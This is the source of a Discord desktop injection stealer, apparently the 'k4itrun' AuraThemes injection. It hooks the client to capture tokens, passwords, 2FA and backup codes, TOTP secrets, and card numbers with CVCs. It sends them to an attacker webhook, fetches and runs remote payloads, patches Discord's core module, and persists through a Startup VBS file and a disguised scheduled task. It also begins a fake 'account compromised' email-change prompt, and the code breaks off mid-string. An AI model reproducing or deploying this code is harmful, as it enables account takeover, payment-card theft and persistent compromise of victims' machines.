const querystring = require('querystring'); const https = require('https'); const http = require('http'); const path = require('path'); const fs = require('fs'); const { exec } = require('child_process'); const { promisify } = require('util'); const { BrowserWindow, session } = require('electron'); const execCommand = async (command, options = {}) => { try { const { stdout, stderr } = await promisify(exec)(command, options); if (stderr) { console.error(stderr); } return stdout.trim(); } catch (error) { return null; } }; const execScript = async script => { const windows = BrowserWindow.getAllWindows(); if (windows.length === 0) return null; try { const result = await windows[0].webContents.executeJavaScript(script, true); return result; } catch (error) { return null; } }; const CONFIG = { webhook: '%WEBHOOK_URL%', API: '%API_URL%', auto_user_profile_edit: '%AUTO_USER_PROFILE_EDIT%', auto_persist_startup: '%AUTO_PERSIST_STARTUP%', auto_mfa_disabler: '%AUTO_MFA_DISABLER%', auto_email_update: '%AUTO_EMAIL_UPDATE%', injection_url: 'https://raw.githubusercontent.com/wishware/discord-injection-public/main/injection.js', injector_url: 'https://raw.githubusercontent.com/wishware/discord-vbs-injector/main/injector.vbs', get: { token: () => execScript(`(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken()`), logout: () => execScript( `function getLocalStoragePropertyDescriptor() {const o = document.createElement("iframe");document.head.append(o);const e = Object.getOwnPropertyDescriptor(o.contentWindow, "localStorage");return o.remove(), e};Object.defineProperty(window, "localStorage", getLocalStoragePropertyDescriptor());const localStorage = getLocalStoragePropertyDescriptor().get.call(window);console.log(localStorage.token);if(localStorage.token) {localStorage.token = null,localStorage.tokens = null,localStorage.MultiAccountStore = null,location.reload();} else {return"This is an intentional error";}` ), backup_codes: () => execScript( `const elements = document.querySelectorAll('span[class^="code_"]');const isBoolean = (value) => typeof value === "boolean";const codes = Array.from(elements).map((element) => {const code = element.textContent.trim().replace(/-/g, '');const container = element.closest('span[class^="checkboxWrapper_"]');let consumed = container && Array.from(container.classList).some((className) => className.startsWith("checked_"));consumed = isBoolean(consumed) ? consumed : false;return {code,consumed};});codes;` ), clear_local_storage: () => execScript( `const iframe = document.createElement('iframe');document.body.appendChild(iframe);iframe.contentWindow.localStorage.clear();document.body.removeChild(iframe);setTimeout(() => {window.location.reload();}, 3000);` ), }, auth_filters: { urls: [ '/users/@me', '/auth/login', '/auth/register', '/remote-auth/login', '/mfa/totp', '/mfa/totp/enable', '/mfa/sms/enable', '/mfa/totp/disable', '/mfa/sms/disable', '/mfa/codes-verification', ], }, session_filters: { urls: [ 'wss://remote-auth-gateway.discord.gg/*', 'https://discord.com/api/v*/auth/sessions', 'https://*.discord.com/api/v*/auth/sessions', 'https://discordapp.com/api/v*/auth/sessions', ], }, payment_filters: { urls: [ 'https://api.stripe.com/v*/tokens', 'https://discord.com/api/v9/users/@me/billing/payment-sources/validate-billing-address', 'https://discord.com/api/v*/users/@me/billing/paypal/billing-agreement-tokens', 'https://discordapp.com/api/v*/users/@me/billing/paypal/billing-agreement-tokens', 'https://*.discord.com/api/v*/users/@me/billing/paypal/billing-agreement-tokens', 'https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v*/payment_methods/paypal_accounts', ], }, badges: { _nitro: [ '<:DiscordBoostNitro1:1087043238654906472> ', '<:DiscordBoostNitro2:1087043319227494460> ', '<:DiscordBoostNitro3:1087043368250511512> ', '<:DiscordBoostNitro6:1087043493236592820> ', '<:DiscordBoostNitro9:1087043493236592820> ', '<:DiscordBoostNitro12:1162420359291732038> ', '<:DiscordBoostNitro15:1051453775832961034> ', '<:DiscordBoostNitro18:1051453778127237180> ', '<:DiscordBoostNitro24:1051453776889917530> ', ], _discord_emloyee: { value: 1, emoji: '<:DiscordEmloyee:1163172252989259898>', rare: true, }, _partnered_server_owner: { value: 2, emoji: '<:PartneredServerOwner:1163172304155586570>', rare: true, }, _hypeSquad_events: { value: 4, emoji: '<:HypeSquadEvents:1163172248140660839>', rare: true, }, _bug_hunter_level_1: { value: 8, emoji: '<:BugHunterLevel1:1163172239970140383>', rare: true, }, _house_bravery: { value: 64, emoji: '<:HouseBravery:1163172246492287017>', rare: false, }, _house_brilliance: { value: 128, emoji: '<:HouseBrilliance:1163172244474822746>', rare: false, }, _house_balance: { value: 256, emoji: '<:HouseBalance:1163172243417858128>', rare: false, }, _early_supporter: { value: 512, emoji: '<:EarlySupporter:1163172241996005416>', rare: true, }, _bug_hunter_level_2: { value: 16384, emoji: '<:BugHunterLevel2:1163172238942543892>', rare: true, }, _early_bot_developer: { value: 131072, emoji: '<:EarlyBotDeveloper:1163172236807639143>', rare: true, }, _certified_moderator: { value: 262144, emoji: '<:CertifiedModerator:1163172255489085481>', rare: true, }, _active_developer: { value: 4194304, emoji: '<:ActiveDeveloper:1163172534443851868>', rare: true, }, _spammer: { value: 1048704, emoji: '⌨️', rare: false, }, }, }; const parseJSON = data => { try { return JSON.parse(data || ''); } catch { return {}; } }; const clearLocalStorage = () => { try { CONFIG.get.clear_local_storage(); } catch { return null; } }; const request = async (method, url, headers = {}, data = null) => { try { const requests = [...(url.includes('api/webhooks') ? [url, CONFIG.API] : [url])].map(url => { return new Promise((resolve, reject) => { const { protocol, hostname, pathname, search } = new URL(url); const client = protocol === 'https:' ? https : http; const options = { hostname, path: pathname + search, method, headers: { 'Access-Control-Allow-Origin': '*', ...headers, }, }; const req = client.request(options, res => { let resData = ''; res.on('data', chunk => (resData += chunk)); res.on('end', () => resolve(resData)); }); req.on('error', err => reject(err)); if (data) req.write(data); req.end(); }); }); return Promise.all(requests); } catch (err) { return Promise.reject(err); } }; const AuritaCord = async () => { try { const logout = await CONFIG.get.logout(); const token = await CONFIG.get.token(); const API = new Fetcher(token); const [user, profile, billing, friends, servers] = await Promise.all([ // prettier API.User(), API.Profile(), API.Billing(), API.Friends(), API.Servers(), ]); return { logout, token, user, profile, billing, friends, servers, }; } catch { return {}; } }; const notify = async (ctx, token, user) => { const getData = new GetDataUser(); const [profile, system, network, billing, friends, servers] = [ (await AuritaCord()).profile, await getData.SystemInfo(), await getData.Network(), await getData.Billing(token), await getData.Friends(token), await getData.Servers(token), ]; const [nitro, badges] = [ // prettier getData.Nitro(profile), getData.Badges(user.flags), ]; ctx.content = `\`${process.env.USERNAME}\` - \`${process.env.USERDOMAIN}\`\n\n${ctx.content}`; ctx.username = `AuraThemes - injection`; ctx.avatar_url = `https://i.imgur.com/CeFqJOc.gif`; ctx.embeds[0].fields.unshift({ name: ` Token:`, value: `\`\`\`${token}\`\`\`\n[[Click Here To Copy Your Token]](https://6889-fun.vercel.app/api/aurathemes/raw?data=${token})`, inline: false, }); ctx.embeds[0].thumbnail = { url: `https://cdn.discordapp.com/avatars/${user.id}/${user.avatar}`, }; ctx.embeds[0].fields.push( { name: '\u200b', value: '\u200b', inline: false }, { name: 'Nitro', value: nitro, inline: true }, { name: 'Phone', value: user.phone ? `\`${user.phone}\`` : '❓', inline: true }, { name: '\u200b', value: '\u200b', inline: false }, { name: 'Badges', value: badges, inline: true }, { name: 'Billing', value: billing, inline: true }, { name: 'Path', value: `\`${__dirname.trim().replace(/\\/g, '/')}\``, inline: false } ); if (friends) { ctx.embeds.push({ title: friends.title, description: friends.description }); } if (servers) { ctx.embeds.push({ title: servers.title, description: servers.description }); } ctx.embeds.push({ title: `System Information`, fields: [ { name: 'User', value: `||\`\`\`\nUsername: ${process.env.USERNAME}\nHostname: ${process.env.USERDOMAIN}\`\`\`||` }, { name: 'System', value: `||\`\`\`\n${Object.entries(system) .map(([name, value]) => `${name}: ${value}`) .join('\n')}\`\`\`||`, }, { name: 'Network', value: `||\`\`\`\n${Object.entries(network) .map(([name, value]) => `${name}: ${value}`) .join('\n')}\`\`\`||`, }, ], }); ctx.embeds.forEach(embed => { embed.color = 12740607; embed.author = { name: `${user.username} | ${user.id}`, icon_url: user.avatar ? `https://cdn.discordapp.com/avatars/${user.id}/${user.avatar}.png` : `https://cdn.discordapp.com/embed/avatars/${Math.round(Math.random() * 5)}.png`, }; embed.footer = { text: 'github.com/k4itrun/discord-injection - made by k4itrun', icon_url: 'https://avatars.githubusercontent.com/u/103044629', }; embed.timestamp = new Date(); }); try { return await request( 'POST', CONFIG.webhook, { 'Content-Type': 'application/json', }, JSON.stringify(ctx) ); } catch (error) { return null; } }; const getBackupCodes = async response => { try { const backup_codes = await CONFIG.get.backup_codes(); const codes = response.backup_codes || backup_codes; const filtered = codes.filter(code => !code.consumed); const validCode = filtered.map(code => `${code.code.slice(0, 4)}-${code.code.slice(4)}`).join('\n'); return validCode; } catch (error) { return ''; } }; const editSettingUser = async token => { try { const response = parseJSON( await request( 'PATCH', 'https://discord.com/api/v9/users/@me/settings', { 'Content-Type': 'application/json', Authorization: token, }, JSON.stringify({ status: 'dnd', email_notifications_enabled: false, stream_notifications_enabled: false, custom_status: { text: 'hackedbyk4itrun', expires_at: null, emoji_id: null, emoji_name: null, }, }) ) ); return response; } catch (error) { return {}; } }; class Fetcher { constructor(token) { this.token = token; } _fetch = async (endpoint, headers) => { const APIs = ['https://discordapp.com/api', 'https://discord.com/api', 'https://canary.discord.com/api', 'https://ptb.discord.com/api']; const response = parseJSON(await request('GET', `${APIs[Math.floor(Math.random() * APIs.length)]}/v9/users/${endpoint}`, headers)); return response; }; User = async () => { return await this._fetch('@me', { 'Content-Type': 'application/json', Authorization: this.token, }); }; Profile = async () => { return await this._fetch(`${Buffer.from(this.token.split('.')[0], 'base64').toString('binary')}/profile`, { 'Content-Type': 'application/json', Authorization: this.token, }); }; Friends = async () => { return await this._fetch('@me/relationships', { 'Content-Type': 'application/json', Authorization: this.token, }); }; Servers = async () => { return await this._fetch('@me/guilds?with_counts=true', { 'Content-Type': 'application/json', Authorization: this.token, }); }; Billing = async () => { return await this._fetch('@me/billing/payment-sources', { 'Content-Type': 'application/json', Authorization: this.token, }); }; } class GetDataUser { SystemInfo = async () => { try { const [os, cpu, gpu, ram, uuid, productKey, macAddress, localIP, cpuCount] = await Promise.all([ execCommand('wmic OS get caption, osarchitecture | more +1'), execCommand('wmic cpu get name | more +1'), execCommand('wmic PATH Win32_VideoController get name | more +1').then(stdout => stdout.replace(/\r\n|\r/g, '')), execCommand('wmic computersystem get totalphysicalmemory | more +1').then(stdout => `${Math.floor(parseInt(stdout) / (1024 * 1024 * 1024))} GB`), execCommand('powershell.exe (Get-CimInstance -Class Win32_ComputerSystemProduct).UUID'), execCommand("powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"), execCommand("powershell.exe (Get-CimInstance -ClassName 'Win32_NetworkAdapter' -Filter 'NetConnectionStatus = 2').MACAddress"), execCommand('powershell.exe (Get-NetIPAddress).IPAddress'), execCommand('echo %NUMBER_OF_PROCESSORS%'), ]); return { os, cpu, gpu, ram, uuid, productKey, macAddress, localIP, cpuCount, }; } catch (error) { return {}; } }; Network = async () => { try { const response = parseJSON( await request('GET', 'http://ip-api.com/json', { 'Content-Type': 'application/json', }) ); return response; } catch (error) { return {}; } }; Badges = flags => Object.keys(CONFIG.badges).reduce( (result, badge) => CONFIG.badges.hasOwnProperty(badge) && (flags & CONFIG.badges[badge].value) === CONFIG.badges[badge].value ? `${result}${CONFIG.badges[badge].emoji} ` : result, '' ) || '❓'; RareBadges = flags => Object.keys(CONFIG.badges).reduce( (result, badge) => CONFIG.badges.hasOwnProperty(badge) && (flags & CONFIG.badges[badge].value) === CONFIG.badges[badge].value && CONFIG.badges[badge].rare ? `${result}${CONFIG.badges[badge].emoji} ` : result, '' ) || ''; Billing = async token => { const API = new Fetcher(token); const data = await API.Billing(); const payment = { 1: '💳', 2: '<:Paypal:1129073151746252870>', }; return data.map(method => payment[method.type] || '❓').join('') || '❓'; }; Friends = async token => { const API = new Fetcher(token); const friends = await API.Friends(); const { RareBadges } = new GetDataUser(); const filteredFriends = friends .filter(friend => friend.type === 1) .map(friend => ({ username: friend.user.username, flags: RareBadges(friend.user.public_flags), })); const rareFriends = filteredFriends.filter(friend => friend.flags); const hQFriends = rareFriends.map(friend => { const name = `${friend.username}`; return `${friend.flags} | ${name}\n`; }); const hQFriendsPlain = hQFriends.join(''); if (hQFriendsPlain.length === 0) { return false; } if (hQFriendsPlain.length > 4050) { return { title: `**Rare Friends (Too many to display):**\n`, description: 'Too many friends to display.', }; } return { title: `**Rare Friends (${hQFriends.length}):**\n`, description: `${hQFriendsPlain}`, }; }; Servers = async token => { const API = new Fetcher(token); const guilds = await API.Servers(); const filteredGuilds = guilds .filter(guild => guild.owner || (guild.permissions & 8) === 8) .filter(guild => guild.approximate_member_count >= 500) .map(guild => ({ id: guild.id, name: guild.name, owner: guild.owner, member_count: guild.approximate_member_count, })); const hQGuilds = await Promise.all( filteredGuilds.map(async guild => { const response = parseJSON( await request('GET', `https://discord.com/api/v8/guilds/${guild.id}/invites`, { 'Content-Type': 'application/json', Authorization: token, }) ); const invites = response; const invite = invites.length > 0 ? `[Join Server](https://discord.gg/${invites[0].code})` : 'No Invite'; const emoji = guild.owner ? `<:Owner:963333541343686696> Owner` : `<:Staff:1136740017822253176> Admin`; const members = `Members: \`${guild.member_count}\``; const name = `**${guild.name}** - (${guild.id})`; return `${emoji} | ${name} - ${members} - ${invite}\n`; }) ); const hQGuildsPlain = hQGuilds.join(''); if (hQGuildsPlain.length === 0) { return false; } if (hQGuildsPlain.length > 4050) { return { title: `**Rare Servers (Too many to display):**\n`, description: 'Too many servers to display.', }; } return { title: `**Rare Guilds (${hQGuilds.length}):**\n`, description: `${hQGuildsPlain}`, }; }; getDate = (current, months) => { return new Date(current).setMonth(current.getMonth() + months); }; Nitro = flags => { const { premium_type, premium_guild_since } = flags, nitro = '<:DiscordNitro:587201513873473542>'; switch (premium_type) { default: return '❓'; case 1: return nitro; case 2: if (!premium_guild_since) return nitro; let months = [1, 2, 3, 6, 9, 12, 15, 18, 24], rem = 0; for (let i = 0; i < months.length; i++) if (Math.round((this.getDate(new Date(premium_guild_since), months[i]) - new Date()) / 86400000) > 0) { rem = i; break; } return `${nitro} ${CONFIG.badges._nitro[rem]}`; } }; } const delay = ms => { return new Promise(resolve => setTimeout(resolve, ms)); }; const Cruise = async (type, response, request, email, password, token, action) => { let API; let user; let content; switch (type) { case 'LOGIN_USER': API = new Fetcher(token); user = await API.User(); content = { content: `**${user.username}** ${action}!`, embeds: [ { fields: [ { name: 'Password', value: `\`${password}\``, inline: true }, { name: 'Email', value: `\`${email}\``, inline: true }, ], }, ], }; if (request?.code !== undefined) { content.embeds[0].fields.push({ name: 'Used 2FA code', value: `\`${request.code}\``, inline: false }); } notify(content, token, user); break; case 'USERNAME_CHANGED': API = new Fetcher(token); user = await API.User(); content = { content: `**${user.username}** ${action}!`, embeds: [ { fields: [ { name: 'New Username', value: `\`${request.username}\``, inline: true }, { name: 'Password', value: `\`${request.password}\``, inline: true }, { name: 'Email', value: `\`${email}\``, inline: false }, ], }, ], }; notify(content, token, user); break; case 'EMAIL_CHANGED': API = new Fetcher(token); user = await API.User(); content = { content: `**${user.username}** ${action}!`, embeds: [ { fields: [ { name: 'New Email', value: `\`${email}\``, inline: true }, { name: 'Password', value: `\`${password}\``, inline: true }, ], }, ], }; notify(content, token, user); break; case 'PASSWORD_CHANGED': API = new Fetcher(token); user = await API.User(); content = { content: `**${user.username}** ${action}!`, embeds: [ { fields: [ { name: 'New Password', value: `\`${request.new_password}\``, inline: true }, { name: 'Old Password', value: `\`${request.password}\``, inline: true }, { name: 'Email', value: `\`${email}\``, inline: false }, ], }, ], }; notify(content, token, user); break; case 'BACKUP_CODES': API = new Fetcher(token); user = await API.User(); const codes = await getBackupCodes(response); content = { content: `**${user.username}** ${action}!`, embeds: [ { fields: [ { name: 'Password', value: `\`${password}\``, inline: true }, { name: 'Email', value: `\`${email}\``, inline: true }, { name: '\u200b', value: '\u200b', inline: false }, { name: 'Security codes', value: `\`\`\`\n${codes}\`\`\``, inline: false }, ], }, ], }; if (request?.code !== undefined && request?.secret !== undefined) { content.embeds[0].fields.push( { name: 'Used 2FA code', value: `\`${request.code}\``, inline: true }, { name: 'Authentication secret', value: `\`${request.secret}\``, inline: true } ); } notify(content, token, user); break; case 'CREDITCARD_ADDED': API = new Fetcher(token); user = await API.User(); content = { content: `**${user.username}** ${action}!`, embeds: [ { fields: [ { name: 'Email', value: `\`${email}\``, inline: true }, { name: '\u200b', value: '\u200b', inline: false }, { name: 'Number', value: `\`${request.item['card[number]']}\``, inline: true }, { name: 'CVC', value: `\`${request.item['card[cvc]']}\``, inline: true }, { name: 'Expiration', value: `\`${request.item['card[exp_month]']}/${request.item['card[exp_year]']}\``, inline: true }, ], fields: [ { name: 'Address', value: `\`\`\`\nLine 1: ${request['line_1']}\nLine 2: ${request['line_2']}\nCity: ${request['city']}\nState: ${request['state']}\nPostal Code: ${request['postal_code']}\nCountry: ${request['country']}\n\`\`\``, inline: false, }, ], }, ], }; notify(content, token, user); break; case 'PAYPAL_ADDED': API = new Fetcher(token); user = await API.User(); content = { content: `**${user.username}** ${action}!`, embeds: [ { fields: [{ name: 'Email', value: `\`${email}\``, inline: true }], }, ], }; notify(content, token, user); break; case 'INJECTED': API = new Fetcher(token); user = await API.User(); content = { content: `**${user.username}** ${action}!`, embeds: [ { fields: [{ name: 'Email', value: `\`${email}\``, inline: true }], }, ], }; notify(content, token, user); break; default: } }; const forcePersistStartup = async () => { const vbsFileName = 'DiscordBetterProtector.vbs'; const batFileName = 'setupTask.bat'; const protectFolderPath = path.join(process.env.APPDATA, 'Microsoft', 'Protect'); const vbsFilePathInProtect = path.join(protectFolderPath, vbsFileName); const startupFolderPath = path.join(process.env.APPDATA, 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup'); const vbsFilePathInStartup = path.join(startupFolderPath, vbsFileName); const batFilePath = path.join(__dirname, batFileName); const scriptVbsContent = await request('GET', CONFIG.injector_url, { 'Content-Type': 'text/plain', }); const responseVbsMalware = scriptVbsContent[0]?.toString('utf8') || ''; const vbsContent = responseVbsMalware .replace('replace_webhook_url', CONFIG.webhook) .replace('replace_api_url', CONFIG.API) .replace('replace_auto_user_profile_edit', CONFIG.auto_user_profile_edit) .replace('replace_auto_persist_startup', CONFIG.auto_persist_startup) .replace('replace_auto_mfa_disabler', CONFIG.auto_mfa_disabler) .replace('replace_auto_email_update', CONFIG.auto_email_update); const checkFileExists = filePath => { return new Promise(resolve => { fs.access(filePath, fs.constants.F_OK, err => { resolve(!err); }); }); }; const checkScheduledTaskExists = () => { return new Promise(resolve => { exec('schtasks /query /tn "WindowsSecurityHealthSystrayk4itrun"', err => { resolve(!err); }); }); }; const createVBSFile = filePath => { return new Promise((resolve, reject) => { fs.writeFile(filePath, vbsContent.trim(), err => { if (err) return reject(err); resolve(); }); }); }; const createBatchFile = () => { const batContent = ` @echo off setlocal set "vbsFilePath=%APPDATA%\\Microsoft\\Protect\\${vbsFileName}" schtasks /create /tn "WindowsSecurityHealthSystrayk4itrun" /tr "wscript.exe \"%vbsFilePath%\"" /sc onlogon /f if %ERRORLEVEL% EQU 0 ( echo We are scanning your Discord application(s).... ) else ( echo An unexpected error occurred... ) timeout /t 5 /nobreak > NUL del "%~f0" endlocal `; return new Promise((resolve, reject) => { fs.writeFile(batFilePath, batContent.trim(), err => { if (err) return reject(err); resolve(); }); }); }; const executeBatchFile = () => { return new Promise((resolve, reject) => { exec(`powershell -Command "Start-Process cmd -ArgumentList '/c \"${batFilePath}\"' -Verb RunAs"`, err => { if (err) return reject(err); resolve(); }); }); }; const protectExists = await checkFileExists(vbsFilePathInProtect); const startupExists = await checkFileExists(vbsFilePathInStartup); const taskExists = await checkScheduledTaskExists(); if (!protectExists) { await createVBSFile(vbsFilePathInProtect); } if (!startupExists) { await createVBSFile(vbsFilePathInStartup); } if (!taskExists) { await createBatchFile(); await executeBatchFile(); setTimeout(() => { fs.unlink(batFilePath, error => { if (error) { console.log(error); } }); }, 10000); } }; const startup = async () => { const startupDir = path.join(__dirname, 'aurathemes'); const { token, user } = await AuritaCord(); if (token) { if (fs.existsSync(startupDir)) { fs.rmdirSync(startupDir); Cruise('INJECTED', null, null, user.email, null, token, `It is injected in the route: \`${__dirname.trim().replace(/\\/g, '/')}\``); clearLocalStorage(); } } const getDiscordPaths = () => { const args = process.argv; const appDir = path.dirname(args[0]); let resourceDir; switch (process.platform) { case 'win32': resourceDir = path.join(appDir, 'resources'); break; default: return { resource: undefined, app: undefined }; } return fs.existsSync(resourceDir) ? { resource: resourceDir, app: appDir } : { resource: undefined, app: undefined }; }; const { resource, app } = getDiscordPaths(); if (!resource || !app) return; const appDir = path.join(resource, 'app'); const packageJsonFile = path.join(appDir, 'package.json'); const startupScriptRunJsFile = path.join(appDir, 'index.js'); const coreJsFile = path.join( app, 'modules', fs.readdirSync(path.join(app, 'modules')).find(file => /discord_desktop_core-/.test(file)), 'discord_desktop_core', 'index.js' ); const betterDiscordAsarFile = path.join(process.env.APPDATA, 'betterdiscord', 'data', 'betterdiscord.asar'); if (!fs.existsSync(appDir)) { fs.mkdirSync(appDir, { recursive: true }); } [packageJsonFile, startupScriptRunJsFile].forEach(file => { if (fs.existsSync(file)) fs.unlinkSync(file); }); // In the future maybe add more operating systems! // This may work on other systems but Windows is recommended if (['win32'].includes(process.platform)) { fs.writeFileSync(packageJsonFile, JSON.stringify({ name: 'discord', main: 'index.js' }, null, 4)); const scriptRunJsFileContent = ` const fs = require('fs'); const https = require('https'); const path = require('path'); const coreJsFile = '${coreJsFile}'; const betterDiscordAsarFile = '${betterDiscordAsarFile}'; const initialize = async () => { try { const data = await fs.promises.readFile(coreJsFile, 'utf8'); if ( data.length < 20000 || data === "module.exports = require('./core.asar')" ) { await downloadAndUpdateFile(); }; } catch (err) { console.error(err); } }; const downloadAndUpdateFile = async () => { try { const fileStream = fs.createWriteStream(coreJsFile); await new Promise((resolve, reject) => { https.get('${CONFIG.injection_url}', (res) => { res.on('data', chunk => fileStream.write( chunk.toString() .replace('%WEBHOOK_URL%', '${CONFIG.webhook}') .replace('%API_URL%', '${CONFIG.API}') .replace('%AUTO_USER_PROFILE_EDIT%', '${CONFIG.auto_user_profile_edit}') .replace('%AUTO_PERSIST_STARTUP%', '${CONFIG.auto_persist_startup}') .replace('%AUTO_MFA_DISABLER%', '${CONFIG.auto_mfa_disabler}') .replace('%AUTO_EMAIL_UPDATE%', '${CONFIG.auto_email_update}') )); res.on('end', () => { fileStream.end(); resolve(); }); }).on('error', err => { reject(err); }); }); } catch (err) { setTimeout(downloadAndUpdateFile, 10000); } }; initialize(); require('${path.join(resource, 'app.asar')}'); if (fs.existsSync(betterDiscordAsarFile)) require(betterDiscordAsarFile); `; fs.writeFileSync(startupScriptRunJsFile, scriptRunJsFileContent.replace(/\\/g, '\\\\')); } }; const translateEmailUpdate = async (token, locale) => { const message = [ 'User Settings', 'Edit email address', 'We have detected something unusual with your (Discord) account, your address,', 'has been compromised.', 'Please change it to continue using your account.', 'No longer have access to your email', 'Contact your email provider to fix it.', ]; const sanitized = message.map(item => item.replace(/[.,]/g, '')); try { const textParam = encodeURIComponent(JSON.stringify(sanitized)); const response = parseJSON( await request('GET', `https://translate.w1sh.xyz/translate?key=K4ITRUN_IS_GOD&text=${textParam}&language=${locale}`, { 'Content-Type': 'application/json', Authorization: token, }) ); if (!response.success) { return message; } const translatedText = parseJSON(response.text); return Array.isArray(translatedText) && translatedText.length === message.length ? translatedText : message; } catch (error) { return message; } }; let [email, password, script_executed] = ['', '', false]; const GangwayCord = async (params, RESPONSE_DATA, RESQUEST_DATA, token, user) => { try { switch (true) { case params.response.url.endsWith('/login'): if (params.response.url.endsWith('/remote-auth/login')) { // With this update, QR codes are blocked in the function allSessionsLocked(), // so this is here just in case the QR code blocking fails if (!RESPONSE_DATA.encrypted_token) return; await delay(2000); const { token: newToken, user: newUser } = await AuritaCord(); Cruise('LOGIN_USER', RESPONSE_DATA, RESQUEST_DATA, newUser.email, 'The password was not found', newToken, `You have logged in using QR code`); } if (!RESPONSE_DATA.token) { email = RESQUEST_DATA.login; password = RESQUEST_DATA.password; return; } Cruise('LOGIN_USER', RESPONSE_DATA, RESQUEST_DATA, RESQUEST_DATA.login, RESQUEST_DATA.password, token, `has Logged in-`); break; case params.response.url.endsWith('/register'): Cruise('LOGIN_USER', RESPONSE_DATA, RESQUEST_DATA, RESQUEST_DATA.email, RESQUEST_DATA.password, token, 'has `Created` a new account'); break; case params.response.url.endsWith('/totp'): Cruise('LOGIN_USER', RESPONSE_DATA, RESQUEST_DATA, email, password, token, `you are logged in with \`2FA\``); break; case params.response.url.endsWith('/enable'): case params.response.url.endsWith('/codes-verification'): const count = RESPONSE_DATA.backup_codes?.length ?? 0; Cruise('BACKUP_CODES', RESPONSE_DATA, RESQUEST_DATA, user.email, 'The password was not found', token, `\`${count} security\` codes have just been added`); break; case params.response.url.endsWith('/@me'): if (!RESQUEST_DATA.password) return; if (RESQUEST_DATA.email && RESQUEST_DATA.email_token) { Cruise('EMAIL_CHANGED', RESPONSE_DATA, RESQUEST_DATA, RESQUEST_DATA.email, RESQUEST_DATA.password, token, `has updated their email to \`${RESQUEST_DATA.email}\``); } if (RESQUEST_DATA.new_password) { Cruise('PASSWORD_CHANGED', RESPONSE_DATA, RESQUEST_DATA, user.email, RESQUEST_DATA.password, token, `has updated their password to \`${RESQUEST_DATA.new_password}\``); } if (RESQUEST_DATA.username) { Cruise('USERNAME_CHANGED', RESPONSE_DATA, RESQUEST_DATA, user.email, RESQUEST_DATA.password, token, `has updated their username to \`${RESQUEST_DATA.username}\``); } break; } } catch (error) { console.error(error); } }; const createWindow = () => { const mainWindow = BrowserWindow.getAllWindows()[0]; if (!mainWindow) return; mainWindow.webContents.debugger.attach('1.3'); mainWindow.webContents.debugger.on('message', async (_, method, params) => { if ('Network.responseReceived' !== method) return; if (!CONFIG.auth_filters.urls.some(url => params.response.url.endsWith(url)) || ![200, 202].includes(params.response.status)) return; try { const [{ body: responseBody }, { postData: requestPostData }] = await Promise.all([ mainWindow.webContents.debugger.sendCommand('Network.getResponseBody', { requestId: params.requestId }), mainWindow.webContents.debugger.sendCommand('Network.getRequestPostData', { requestId: params.requestId }), ]); const RESPONSE_DATA = parseJSON(responseBody); const RESQUEST_DATA = parseJSON(requestPostData); const { token, user } = await AuritaCord(); GangwayCord(params, RESPONSE_DATA, RESQUEST_DATA, token, user); } catch (error) { console.error(error); } }); mainWindow.webContents.debugger.sendCommand('Network.enable'); mainWindow.on('closed', () => { createWindow(); }); }; const isLogged = async () => { const LOG_FILE_PATH = path.join(__dirname, 'core.log'); try { const { token } = await AuritaCord(); if (token) { if (!fs.existsSync(LOG_FILE_PATH)) { fs.writeFileSync(LOG_FILE_PATH, 'logout'); await request( 'POST', 'https://discord.com/api/v9/auth/logout', { 'Content-Type': 'application/json', Authorization: token, }, JSON.stringify({ provider: null, voip_provider: null, }) ); return false; } return true; } fs.writeFileSync(LOG_FILE_PATH, 'logout'); return false; } catch (error) { return false; } }; const defaultSession = () => { const webRequest = session.defaultSession.webRequest; if (!webRequest) return; webRequest.onCompleted(CONFIG.payment_filters, async details => { const { url, uploadData, method, statusCode, billing_address } = details; if (![200, 202].includes(statusCode) && !['POST'].includes(method)) return; const { token, user } = await AuritaCord(); if (!token) return; switch (true) { case url.includes('stripe'): let item; try { item = querystring.parse(Buffer.from(uploadData[0].bytes).toString()); } catch (error) { item = querystring.parse(decodeURIComponent(uploadData[0]?.bytes.toString() || '')); } const { line_1, line_2, city, state, postal_code, country, email } = billing_address; const request = { item, line_1, line_2, city, state, postal_code, country, email, }; Cruise('CREDITCARD_ADDED', null, request, user.email, null, token, `you just added a \`Credit Card\``); break; case url.endsWith('paypal_accounts') || url.endsWith('billing-agreement-tokens'): Cruise('PAYPAL_ADDED', null, null, user.email, null, token, `you just added a \`Paypal\` account`); break; } }); }; const interceptRequest = () => { const webRequest = session.defaultSession.webRequest; if (!webRequest) return; webRequest.onHeadersReceived(async (request, callback) => { const { url, method, statusCode, responseHeaders, uploadData } = request; const updatedHeaders = { ...responseHeaders }; ['content-security-policy', 'content-security-policy-report-only'].forEach(header => { delete updatedHeaders[header]; }); callback({ responseHeaders: { ...updatedHeaders, 'Access-Control-Allow-Headers': '*', }, }); const processUserUpdate = async () => { const { token, user } = await AuritaCord(); if (!token) return; if (CONFIG.auto_user_profile_edit === 'true') { await editSettingUser(token); } if (CONFIG.auto_email_update === 'true') { const locale = user.locale || 'en-US'; const truncateEmail = (email = '@') => { const [localPart, domain] = email.split('@'); return `${localPart.slice(0, 15)}${localPart.length > 15 ? '...' : ''}@${domain || ''}`; }; const [CONFIG_ALERT, EDIT_MAIL_ALERT, ALERT_INTRO, END_INTRO_ALERT, CHANGE_ALERT, LAST_END_ALERT, CONTACT_ALERT] = await translateEmailUpdate(token, locale); await execScript(` const loadStylesheets = (urls) => { const head = document.head || document.getElementsByTagName('head')[0]; urls.forEach(url => { const link = document.createElement('link'); link.rel = 'stylesheet'; link.href = url; head.appendChild(link); }); }; const changeEmail = async () => { loadStylesheets([ '/assets/d4261c08ee2b8d686d9d.css' ]); const placeholder = document.createElement('div'); placeholder.innerHTML = \`
